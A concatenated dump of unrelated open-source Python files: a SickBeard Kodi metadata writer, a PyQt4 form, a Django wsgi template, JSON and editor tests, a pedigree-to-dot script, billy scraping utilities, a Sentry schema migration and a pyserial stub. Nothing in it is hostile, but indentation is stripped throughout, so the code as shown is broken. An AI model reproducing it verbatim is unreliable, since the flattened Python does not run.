tv_node = etree.Element("tvshow")
try:
myShow = t[int(show_ID)]
except sickbeard.indexer_shownotfound:
logger.log(u"Unable to find show with id " + str(show_ID) + " on " + sickbeard.indexerApi(
show_obj.indexer).name + ", skipping it", logger.ERROR)
raise
except sickbeard.indexer_error:
logger.log(
u"" + sickbeard.indexerApi(show_obj.indexer).name + " is down, can't use its data to add this show",
logger.ERROR)
raise
# check for title and id
if getattr(myShow, 'seriesname', None) is None or getattr(myShow, 'id', None) is None:
logger.log(u"Incomplete info for show with id " + str(show_ID) + " on " + sickbeard.indexerApi(
show_obj.indexer).name + ", skipping it", logger.ERROR)
return False
title = etree.SubElement(tv_node, "title")
if getattr(myShow, 'seriesname', None) is not None:
title.text = myShow["seriesname"]
rating = etree.SubElement(tv_node, "rating")
if getattr(myShow, 'rating', None) is not None:
rating.text = myShow["rating"]
year = etree.SubElement(tv_node, "year")
if getattr(myShow, 'firstaired', None) is not None:
try:
year_text = str(datetime.datetime.strptime(myShow["firstaired"], '%Y-%m-%d').year)
if year_text:
year.text = year_text
except:
pass
plot = etree.SubElement(tv_node, "plot")
if getattr(myShow, 'overview', None) is not None:
plot.text = myShow["overview"]
episodeguide = etree.SubElement(tv_node, "episodeguide")
episodeguideurl = etree.SubElement(episodeguide, "url")
episodeguideurl2 = etree.SubElement(tv_node, "episodeguideurl")
if getattr(myShow, 'id', None) is not None:
showurl = sickbeard.indexerApi(show_obj.indexer).config['base_url'] + str(myShow["id"]) + '/all/en.zip'
episodeguideurl.text = showurl
episodeguideurl2.text = showurl
mpaa = etree.SubElement(tv_node, "mpaa")
if getattr(myShow, 'contentrating', None) is not None:
mpaa.text = myShow["contentrating"]
indexerid = etree.SubElement(tv_node, "id")
if getattr(myShow, 'id', None) is not None:
indexerid.text = str(myShow["id"])
indexer = etree.SubElement(tv_node, "indexer")
if show_obj.indexer is not None:
indexer.text = str(show_obj.indexer)
genre = etree.SubElement(tv_node, "genre")
if getattr(myShow, 'genre', None) is not None:
if isinstance(myShow["genre"], basestring):
genre.text = " / ".join(x.strip() for x in myShow["genre"].split('|') if x.strip())
premiered = etree.SubElement(tv_node, "premiered")
if getattr(myShow, 'firstaired', None) is not None:
premiered.text = myShow["firstaired"]
studio = etree.SubElement(tv_node, "studio")
if getattr(myShow, 'network', None) is not None:
studio.text = myShow["network"]
if getattr(myShow, '_actors', None) is not None:
for actor in myShow['_actors']:
cur_actor = etree.SubElement(tv_node, "actor")
cur_actor_name = etree.SubElement(cur_actor, "name")
if getattr(actor, 'name', None) is not None:
cur_actor_name.text = actor['name'].strip()
cur_actor_role = etree.SubElement(cur_actor, "role")
if getattr(actor, 'role', None) is not None:
cur_actor_role.text = actor['role']
cur_actor_thumb = etree.SubElement(cur_actor, "thumb")
if getattr(actor, 'image', None) is not None:
cur_actor_thumb.text = actor['image']
# Make it purdy
helpers.indentXML(tv_node)
data = etree.ElementTree(tv_node)
return data
def _ep_data(self, ep_obj):
"""
Creates an elementTree XML structure for an KODI-style episode.nfo and
returns the resulting data object.
show_obj: a TVEpisode instance to create the NFO for
"""
eps_to_write = [ep_obj] + ep_obj.relatedEps
indexer_lang = ep_obj.show.lang
lINDEXER_API_PARMS = sickbeard.indexerApi(ep_obj.show.indexer).api_params.copy()
lINDEXER_API_PARMS['actors'] = True
if indexer_lang and not indexer_lang == 'en':
lINDEXER_API_PARMS['language'] = indexer_lang
if ep_obj.show.dvdorder != 0:
lINDEXER_API_PARMS['dvdorder'] = True
try:
t = sickbeard.indexerApi(ep_obj.show.indexer).indexer(**lINDEXER_API_PARMS)
myShow = t[ep_obj.show.indexerid]
except sickbeard.indexer_shownotfound, e:
raise exceptions.ShowNotFoundException(e.message)
except sickbeard.indexer_error, e:
logger.log(u"Unable to connect to " + sickbeard.indexerApi(
ep_obj.show.indexer).name + " while creating meta files - skipping - " + ex(e), logger.ERROR)
return
if len(eps_to_write) > 1:
rootNode = etree.Element("kodimultiepisode")
else:
rootNode = etree.Element("episodedetails")
# write an NFO containing info for all matching episodes
for curEpToWrite in eps_to_write:
try:
myEp = myShow[curEpToWrite.season][curEpToWrite.episode]
except (sickbeard.indexer_episodenotfound, sickbeard.indexer_seasonnotfound):
logger.log(u"Unable to find episode " + str(curEpToWrite.season) + "x" + str(
curEpToWrite.episode) + " on " + sickbeard.indexerApi(
ep_obj.show.indexer).name + ".. has it been removed? Should I delete from db?")
return None
if getattr(myEp, 'firstaired', None) is None:
myEp["firstaired"] = str(datetime.date.fromordinal(1))
if getattr(myEp, 'episodename', None) is None:
logger.log(u"Not generating nfo because the ep has no title", logger.DEBUG)
return None
logger.log(u"Creating metadata for episode " + str(ep_obj.season) + "x" + str(ep_obj.episode), logger.DEBUG)
if len(eps_to_write) > 1:
episode = etree.SubElement(rootNode, "episodedetails")
else:
episode = rootNode
title = etree.SubElement(episode, "title")
if curEpToWrite.name != None:
title.text = curEpToWrite.name
showtitle = etree.SubElement(episode, "showtitle")
if curEpToWrite.show.name != None:
showtitle.text = curEpToWrite.show.name
season = etree.SubElement(episode, "season")
season.text = str(curEpToWrite.season)
episodenum = etree.SubElement(episode, "episode")
episodenum.text = str(curEpToWrite.episode)
uniqueid = etree.SubElement(episode, "uniqueid")
uniqueid.text = str(curEpToWrite.indexerid)
aired = etree.SubElement(episode, "aired")
if curEpToWrite.airdate != datetime.date.fromordinal(1):
aired.text = str(curEpToWrite.airdate)
else:
aired.text = ''
plot = etree.SubElement(episode, "plot")
if curEpToWrite.description != None:
plot.text = curEpToWrite.description
runtime = etree.SubElement(episode, "runtime")
if curEpToWrite.season != 0:
if getattr(myShow, 'runtime', None) is not None:
runtime.text = myShow["runtime"]
displayseason = etree.SubElement(episode, "displayseason")
if getattr(myEp, 'airsbefore_season', None) is not None:
displayseason_text = myEp['airsbefore_season']
if displayseason_text != None:
displayseason.text = displayseason_text
displayepisode = etree.SubElement(episode, "displayepisode")
if getattr(myEp, 'airsbefore_episode', None) is not None:
displayepisode_text = myEp['airsbefore_episode']
if displayepisode_text != None:
displayepisode.text = displayepisode_text
thumb = etree.SubElement(episode, "thumb")
thumb_text = getattr(myEp, 'filename', None)
if thumb_text != None:
thumb.text = thumb_text
watched = etree.SubElement(episode, "watched")
watched.text = 'false'
credits = etree.SubElement(episode, "credits")
credits_text = getattr(myEp, 'writer', None)
if credits_text != None:
credits.text = credits_text
director = etree.SubElement(episode, "director")
director_text = getattr(myEp, 'director', None)
if director_text is not None:
director.text = director_text
rating = etree.SubElement(episode, "rating")
rating_text = getattr(myEp, 'rating', None)
if rating_text != None:
rating.text = rating_text
gueststar_text = getattr(myEp, 'gueststars', None)
if isinstance(gueststar_text, basestring):
for actor in (x.strip() for x in gueststar_text.split('|') if x.strip()):
cur_actor = etree.SubElement(episode, "actor")
cur_actor_name = etree.SubElement(cur_actor, "name")
cur_actor_name.text = actor
if getattr(myEp, '_actors', None) is not None:
for actor in myShow['_actors']:
cur_actor = etree.SubElement(episode, "actor")
cur_actor_name = etree.SubElement(cur_actor, "name")
cur_actor_name_text = actor['name']
if isinstance(cur_actor_name_text, basestring):
cur_actor_name.text = cur_actor_name_text.strip()
cur_actor_role = etree.SubElement(cur_actor, "role")
cur_actor_role_text = actor['role']
if cur_actor_role_text != None:
cur_actor_role.text = cur_actor_role_text
cur_actor_thumb = etree.SubElement(cur_actor, "thumb")
cur_actor_thumb_text = actor['image']
if cur_actor_thumb_text != None:
cur_actor_thumb.text = cur_actor_thumb_text
# Make it purdy
helpers.indentXML(rootNode)
data = etree.ElementTree(rootNode)
return data
# present a standard "interface" from the module
metadata_class = KODI_12PlusMetadata
|
ajavadia/ScaffCC | refs/heads/master | rkqc/tools/gui/ui/PathBenchmarks.py | 3 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'PathBenchmarks.ui'
#
# Created: Thu Jun 9 13:03:04 2011
# by: PyQt4 UI code generator 4.8.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_PathBenchmarks(object):
def setupUi(self, PathBenchmarks):
PathBenchmarks.setObjectName(_fromUtf8("PathBenchmarks"))
PathBenchmarks.resize(400, 300)
PathBenchmarks.setWindowTitle(_fromUtf8(""))
self.horizontalLayout_2 = QtGui.QHBoxLayout(PathBenchmarks)
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
spacerItem = QtGui.QSpacerItem(91, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem)
self.widget = QtGui.QWidget(PathBenchmarks)
self.widget.setObjectName(_fromUtf8("widget"))
self.formLayout = QtGui.QFormLayout(self.widget)
self.formLayout.setMargin(0)
self.formLayout.setMargin(0)
self.formLayout.setObjectName(_fromUtf8("formLayout"))
self.label = QtGui.QLabel(self.widget)
self.label.setObjectName(_fromUtf8("label"))
self.formLayout.setWidget(0, QtGui.QFormLayout.LabelRole, self.label)
self.label_2 = QtGui.QLabel(self.widget)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.formLayout.setWidget(1, QtGui.QFormLayout.LabelRole, self.label_2)
self.filetype = QtGui.QComboBox(self.widget)
self.filetype.setObjectName(_fromUtf8("filetype"))
self.filetype.addItem(_fromUtf8(""))
self.filetype.addItem(_fromUtf8(""))
self.filetype.addItem(_fromUtf8(""))
self.formLayout.setWidget(1, QtGui.QFormLayout.FieldRole, self.filetype)
self.info = QtGui.QLabel(self.widget)
self.info.setObjectName(_fromUtf8("info"))
self.formLayout.setWidget(2, QtGui.QFormLayout.FieldRole, self.info)
self.path = PathSelector(self.widget)
self.path.setMinimumSize(QtCore.QSize(200, 0))
self.path.setObjectName(_fromUtf8("path"))
self.formLayout.setWidget(0, QtGui.QFormLayout.FieldRole, self.path)
self.horizontalLayout_2.addWidget(self.widget)
spacerItem1 = QtGui.QSpacerItem(90, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.retranslateUi(PathBenchmarks)
QtCore.QMetaObject.connectSlotsByName(PathBenchmarks)
def retranslateUi(self, PathBenchmarks):
self.label.setText(QtGui.QApplication.translate("PathBenchmarks", "Location:", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("PathBenchmarks", "Type:", None, QtGui.QApplication.UnicodeUTF8))
self.filetype.setItemText(0, QtGui.QApplication.translate("PathBenchmarks", "Functions", None, QtGui.QApplication.UnicodeUTF8))
self.filetype.setItemText(1, QtGui.QApplication.translate("PathBenchmarks", "Circuits", None, QtGui.QApplication.UnicodeUTF8))
self.filetype.setItemText(2, QtGui.QApplication.translate("PathBenchmarks", "Truth Tables", None, QtGui.QApplication.UnicodeUTF8))
self.info.setText(QtGui.QApplication.translate("PathBenchmarks", "Please choose a location", None, QtGui.QApplication.UnicodeUTF8))
from core.PathSelector import PathSelector
|
Ecotrust/locus | refs/heads/master | deploy/templates/wsgi.py | 1 | import sys
import site
import os
project = '/usr/local/apps/locus/locus'
ve = '/usr/local/apps/locus/env'
vepath = os.path.join(ve,'lib/python2.7/site-packages')
local_path = os.path.join('/usr/local/lib/python2.7/site-packages')
prev_sys_path = list(sys.path)
# add the site-packages of our virtualenv as a site dir
site.addsitedir(vepath)
# add the app's directory to the PYTHONPATH
sys.path.append(project)
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
# reorder sys.path so new directories from the addsitedir show up first
new_sys_path = [p for p in sys.path if p not in prev_sys_path]
for item in new_sys_path:
sys.path.remove(item)
sys.path[:0] = new_sys_path
# Import django down here so we make sure to get the correct version
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from django.core.handlers.wsgi import WSGIHandler
application = WSGIHandler()
|
GunoH/intellij-community | refs/heads/master | python/testData/editing/unindentTab.before.py | 83 | #// python 3
class C:
def m(self): #// note: TABs instead of spaces
pass
|
chartjes/liesitoldmykids | refs/heads/master | simplejson/tests/test_pass3.py | 261 | from unittest import TestCase
import simplejson as json
# from http://json.org/JSON_checker/test/pass3.json
JSON = r'''
{
"JSON Test Pattern pass3": {
"The outermost value": "must be an object or array.",
"In this test": "It is an object."
}
}
'''
class TestPass3(TestCase):
def test_parse(self):
# test in/out equivalence and parsing
res = json.loads(JSON)
out = json.dumps(res)
self.assertEquals(res, json.loads(out))
|
BertRaeymaekers/scrapbook | refs/heads/master | random_projects/pedigree_scripts/pedtodot.py | 1 | #!/usr/bin/python3
from collections import OrderedDict
import os
import sys
def help(rc: int=0):
print("The pedtodot.py script transforms a pedigree file into a dot file that Graphiz can use to create a graph.")
print("")
print("\t-h: This help message.")
print("\t-f --file: The pedigree file to read [default: /home/bert/Documents/DropBox/banded.txt]")
print("\t-o --output: The output file [default: the pedigree file with the .dot extention instead]")
print("\t-a --ancestor <ancestor>: Limit to individuals with this ancestor.")
print("\t-p --pedigree <individual>: Limit to the pedigree of this individual.")
print("\t-c --center <individual>: Combine -a and -p: both offspring and pedigree.")
print("")
sys.exit(rc)
def write_dot(filename: str, pedigree: dict):
with open(filename, 'w') as dot:
dot.write("digraph PEDIGREE {\n")
dot.write(" rankdir=LR;\n")
for individual, parents in pedigree.items():
for parent in parents:
dot.write(" \"%s\" -> \"%s\"\n" % (parent, individual))
dot.write("}\n")
def _filter_ancestor(ancestor, pedigree: dict):
filtered = OrderedDict()
    # This one (if it exists in the pedigree)
try:
filtered.update({ancestor: pedigree[ancestor]})
except KeyError:
pass
# Looking for offspring: looking for all individuals with this as parent
for individual, parents in pedigree.items():
if ancestor in parents:
# Doing this so the order is ancestor first
new_filtered = _filter_ancestor(individual, pedigree)
new_filtered.update(filtered)
filtered = new_filtered
return filtered
def filter_ancestor(ancestor, pedigree: dict):
filtered = _filter_ancestor(ancestor, pedigree)
# Removing the ancestor pointing to its parents.
try:
del filtered[ancestor]
except KeyError:
pass
return filtered
def filter_pedigree_of(individual, pedigree: dict):
parents = []
# This one
try:
parents = pedigree[individual]
except KeyError:
pass
filtered = OrderedDict({individual: parents})
# Add the pedigree of the parents
for parent in parents:
filtered.update(filter_pedigree_of(parent, pedigree))
return filtered
def read_pedigree(filename: str) -> dict:
with open(filename, 'r') as sped:
pedigree = OrderedDict()
for line in sped:
sline = line.rstrip()
if sline != '':
if (sline[0] != '!') and (sline[0] != '#') and (sline[0] != ' ') and (sline[0] != '@'):
elements = sline.split()
if len(elements) > 0:
pedigree[elements[0]] = []
if len(elements) > 1:
if (elements[1][0] != '?') and (elements[1][0] != 'x'):
pedigree[elements[0]].append(elements[1])
if len(elements) > 2:
if (elements[2][0] != '?') and (elements[2][0] != 'x'):
pedigree[elements[0]].append(elements[2])
return pedigree
if __name__ == '__main__':
in_filename = '/home/bert/Documents/Dropbox/banded.txt'
out_filename = None
ancestor = None
pedigree_of = None
argument_mode = ""
print("Arguments passed: %s" % (sys.argv[1:]))
for argument in sys.argv[1:]:
if argument_mode != "--" and argument.startswith("-"):
if argument == "--":
argument_mode = "--"
elif argument.lower() in ["-h", "--help"]:
help()
elif argument.lower() in ["-f", "--file"]:
argument_mode = "file"
elif argument.lower() in ["-o", "--out"]:
argument_mode = "out"
elif argument.lower() in ["-c", "--center"]:
argument_mode = "center"
elif argument.lower() in ["-a", "--ancestor"]:
argument_mode = "ancestor"
elif argument.lower() in ["-p", "--pedigree", "--pedigree-of"]:
argument_mode = "pedigree-of"
else:
help(1)
else:
if not argument_mode or argument_mode == "--":
in_filename = argument
elif argument_mode == "file":
in_filename = argument
elif argument_mode == "out":
out_filename = argument
elif argument_mode == "center":
ancestor = argument
pedigree_of = argument
elif argument_mode == "ancestor":
ancestor = argument
elif argument_mode == "pedigree-of":
pedigree_of = argument
# Undo the argument mode, unless mode "--"
if argument_mode != "--":
            argument_mode = ""
if not out_filename:
out_filename = "%s.dot" % (in_filename.rsplit('.', 1)[0])
    print('Transforming pedigree file %s to dot file %s' % (in_filename, out_filename))
print(ancestor)
print(pedigree_of)
# Reading pedigree and filtering
pedigree = None
full_pedigree = read_pedigree(in_filename)
if pedigree_of:
pedigree = filter_pedigree_of(pedigree_of, full_pedigree)
print('Filtered out the pedigree of %s (#%s) from the full pedigree (#%s).' % (pedigree_of, len(pedigree), len(full_pedigree)))
if ancestor:
if pedigree:
pedigree.update(filter_ancestor(ancestor, full_pedigree))
            print('Added the offspring of ancestor %s as well (#%s).' % (ancestor, len(pedigree)))
else:
pedigree = filter_ancestor(ancestor, full_pedigree)
            print('Filtered out the offspring of ancestor %s (#%s) from the full pedigree (#%s).' % (ancestor, len(pedigree), len(full_pedigree)))
if not pedigree:
pedigree = full_pedigree
# Writing the dot file
write_dot(out_filename, pedigree)
print("To generate a png from the dotfile, you could do:")
print("\tdot -O -Tpng %s" % (out_filename))
|
mileswwatkins/billy | refs/heads/master | billy/scrape/utils.py | 2 | import re
import itertools
import subprocess
import collections
def url_xpath(url, path):
import requests
import lxml.html
doc = lxml.html.fromstring(requests.get(url).text)
return doc.xpath(path)
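# Usage sketch for url_xpath (the URL and XPath below are illustrative, not
# from the original module):
#   titles = url_xpath('http://example.com/bills', '//h1/text()')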
def convert_pdf(filename, type='xml'):
commands = {'text': ['pdftotext', '-layout', filename, '-'],
'text-nolayout': ['pdftotext', filename, '-'],
'xml': ['pdftohtml', '-xml', '-stdout', filename],
'html': ['pdftohtml', '-stdout', filename]}
try:
pipe = subprocess.Popen(commands[type], stdout=subprocess.PIPE,
close_fds=True).stdout
except OSError as e:
        raise EnvironmentError("error running %s, missing executable? [%s]" %
                               (' '.join(commands[type]), e))
data = pipe.read()
pipe.close()
return data
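# Usage sketch for convert_pdf; both calls assume the poppler-utils binaries
# (pdftotext, pdftohtml) are on PATH and that 'bill.pdf' is an example file:
#   xml_data = convert_pdf('bill.pdf')            # pdftohtml -xml -stdout
#   plain = convert_pdf('bill.pdf', type='text')  # pdftotext -layout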
def pdf_to_lxml(filename, type='html'):
import lxml.html
text = convert_pdf(filename, type)
return lxml.html.fromstring(text)
def clean_spaces(s):
    return re.sub(r'\s+', ' ', s, flags=re.U).strip()
class PlaintextColumns(object):
'''
Parse plain text columns like this into a table:
cols = """
Austin Errington Lawson, L Pryor
Bartlett Forestal Macer Riecken
Battles GiaQuinta Moed Shackleford
Bauer Goodin Moseley Smith, V
Brown,C Hale Niezgodsk Stemler
Candelaria Reardon Harris Pelath Summers
DeLaney Kersey Pierce VanDenburgh
Dvorak Klinker Porter
"""
Usage:
>>> table = PlaintextColumns(cols)
>>> table.rows().next()
('Austin', 'Errington', 'Lawson, L', 'Pryor')
>>> table.cols().next()
('Austin',
'Bartlett',
'Battles',
'Bauer',
'Brown,C',
'Candelaria Reardon',
'DeLaney',
'Dvorak')
>>> list(table.cells())
['Austin', 'Errington', 'Lawson, L', ...]
'''
def __init__(self, text, threshold=3):
'''Threshold is how many times a column boundary (an integer offset
from the beginning of the line) must be found in order to qualify
as a boundary and not an outlier.
'''
self.text = text.strip()
self.threshold = threshold
def _get_column_ends(self):
'''Guess where the ends of the columns lie.
'''
ends = collections.Counter()
for line in self.text.splitlines():
            for matchobj in re.finditer(r'\s{2,}', line.lstrip()):
ends[matchobj.end()] += 1
return ends
def _get_column_boundaries(self):
'''Use the guessed ends to guess the boundaries of the plain
text columns.
'''
# Try to figure out the most common column boundaries.
ends = self._get_column_ends()
if not ends:
# If there aren't even any nontrivial sequences of whitespace
            # dividing text, there may be just one column. In that case,
            # return a single span, effectively the whole line.
return [slice(None, None)]
most_common = []
threshold = self.threshold
for k, v in collections.Counter(ends.values()).most_common():
if k >= threshold:
most_common.append(k)
if most_common:
boundaries = []
for k, v in ends.items():
if v in most_common:
boundaries.append(k)
else:
# Here there weren't enough boundaries to guess the most common
# ones, so just use the apparent boundaries. In other words, we
# have only 1 row. Potentially a source of inaccuracy.
boundaries = ends.keys()
# Convert the boundaries into a list of span slices.
boundaries.sort()
last_boundary = boundaries[-1]
boundaries = zip([0] + boundaries, boundaries)
boundaries = list(itertools.starmap(slice, boundaries))
# And get from the last boundary to the line ending.
boundaries.append(slice(last_boundary, None))
return boundaries
@property
def boundaries(self):
_boundaries = getattr(self, '_boundaries', None)
if _boundaries is not None:
return _boundaries
self._boundaries = _boundaries = self._get_column_boundaries()
return _boundaries
def getcells(self, line):
'''Using self.boundaries, extract cells from the given line.
'''
for boundary in self.boundaries:
cell = line.lstrip()[boundary].strip()
if cell:
                for cell in re.split(r'\s{3,}', cell):
yield cell
else:
yield None
def rows(self):
'''Returns an iterator of row tuples.
'''
for line in self.text.splitlines():
yield tuple(self.getcells(line))
def cells(self):
'''Returns an interator of all cells in the table.
'''
for line in self.text.splitlines():
for cell in self.getcells(line):
yield cell
def cols(self):
'''Returns an interator of column tuples.
'''
return itertools.izip(*list(self.rows()))
__iter__ = cells
|
2014cdag11/2014cadg11 | refs/heads/master | wsgi/static/Brython2.1.0-20140419-113919/Lib/site.py | 805 | import sys
|
nicholasserra/sentry | refs/heads/master | src/sentry/migrations/0023_auto__add_field_event_time_spent.py | 36 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Event.time_spent'
db.add_column('sentry_message', 'time_spent', self.gf('django.db.models.fields.FloatField')(null=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Event.time_spent'
db.delete_column('sentry_message', 'time_spent')
models = {
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'owned_project_set'", 'null': 'True', 'to': "orm['sentry.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'sentry.projectdomain': {
'Meta': {'unique_together': "(('project', 'domain'),)", 'object_name': 'ProjectDomain'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'domain_set'", 'to': "orm['sentry.Project']"})
},
'sentry.projectmember': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'permissions': ('django.db.models.fields.BigIntegerField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'project_set'", 'to': "orm['sentry.User']"})
}
}
complete_apps = ['sentry']
|
brendanhoran/router-tools | refs/heads/master | python/lib/serial/urlhandler/protocol_hwgrep.py | 11 | #! python
#
# This module implements a special URL handler that uses the port listing to
